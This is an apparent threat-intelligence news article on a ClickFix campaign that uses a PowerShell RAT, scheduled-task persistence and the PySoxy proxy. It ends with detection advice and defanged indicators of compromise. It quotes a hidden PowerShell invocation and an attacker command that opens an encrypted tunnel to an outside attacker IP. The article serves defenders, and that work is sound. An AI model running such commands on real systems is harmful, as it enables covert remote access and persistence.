A newly observed ClickFix campaign is pushing beyond simple user-triggered infections, introducing a more persistent and stealthy intrusion chain using PySoxy, a 10-year-old open-source Python SOCKS5 proxy.
Unlike traditional ClickFix attacks that rely on a single PowerShell execution, this campaign builds a layered access model.
A single user action typically executing a malicious PowerShell command from a compromised website initiates a full attack chain involving persistence, reconnaissance, and multiple command-and-control (C2) channels.
The attack begins with a familiar lure. A user visits a compromised site and is tricked into running an obfuscated PowerShell command via explorer.exe.
While this matches known ClickFix techniques, the post-execution behavior is significantly more advanced.
Researchers at ReliaQuest uncovered the activity in April 2026, marking the first known case where ClickFix combines scheduled task persistence with Python-based encrypted proxying to maintain long-term access.
Instead of stopping at initial access, the command deploys a staged PowerShell script that operates as a lightweight remote-access trojan (RAT).
This script communicates with attacker infrastructure every few seconds, retrieves commands, executes them in memory, and sends results back without dropping traditional malware on disk.
At the same time, the attacker establishes persistence using a scheduled task. This task re-executes the malicious script approximately every 40 minutes using stealthy arguments like:
- powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden
This ensures the attack survives process termination or temporary network blocking, effectively turning a one-time execution into a recurring foothold.
Once persistence is in place, the attacker shifts to discovery. Built-in Windows tools are used to enumerate user privileges, domain roles, and domain controllers. Additional activity includes LDAP queries and SMB interactions to map the network environment.
This phase is critical. It confirms that the compromised host can support further operations and helps the attacker identify high-value targets before deploying additional tooling.
Open-Source Python SOCKS5 Proxy
After reconnaissance, the attacker introduces PySoxy, downloaded as a compiled Python bytecode file into the ProgramData directory. Executed via python.exe, the tool establishes an encrypted proxy tunnel back to attacker-controlled infrastructure over port 443.
A typical command observed:
- python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97
This step fundamentally changes the intrusion. Instead of relying solely on PowerShell-based C2, the attacker now has a second, independent access channel using proxy traffic.
Because PySoxy traffic resembles normal encrypted communication, it is harder to detect and classify.
One of the most critical findings is that blocking outbound connections does not stop the attack. In the observed case, both C2 channels were blocked by security controls, yet the scheduled task continued attempting to relaunch the attack chain for hours.
This highlights a key risk: containment efforts that focus only on network indicators may fail if local persistence mechanisms remain intact.
The modular nature of this campaign makes detection difficult. Individual behaviors PowerShell execution, scheduled task creation, Python usage may appear benign in isolation. However, when correlated, they reveal an active compromise.
Security teams are advised to:
- Isolate affected systems immediately rather than relying on connection blocking.
- Review scheduled tasks created shortly after suspicious activity.
- Analyze ProgramData for staged scripts and Python artifacts.
- Hunt for unusual Python command lines with proxy-related arguments like -ssl or -remote_ip.
- Investigate PowerShell-to-Python execution chains and file transfers.
This campaign signals a broader evolution in ClickFix tradecraft. Attackers are no longer relying on single-stage payloads but are instead building flexible, multi-layered access using legitimate tools and older open-source software.
The use of PySoxy demonstrates that even decade-old tools can be repurposed effectively to evade detection.
More importantly, it shows how attackers are adopting a “bring your own interpreter” approach, leveraging existing runtimes like Python to avoid dropping recognizable malware.
As ClickFix continues to evolve, defenders must treat such incidents as full-scale intrusions rather than isolated user errors especially when persistence and secondary tooling are involved.
IOCs
| Artifact | Details | Artifact | Details |
| 185.205.211[.]217 | ClickFix Infrastructure IP | 206.206.103[.]120 | PowerShell RAT C2 |
| 206.206.103[.]106 | Staging and Exfiltration IP | 167.99.158[.]97 | PySoxy Proxy Destination IP |
| strapness[.]com | ClickFix Stager Domain | abledom[.]net | Secondary C2 Domain |
| overlateise[.]com | Hosted the ClickFix script (/api/jquery[.]js) injected into the compromised site |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
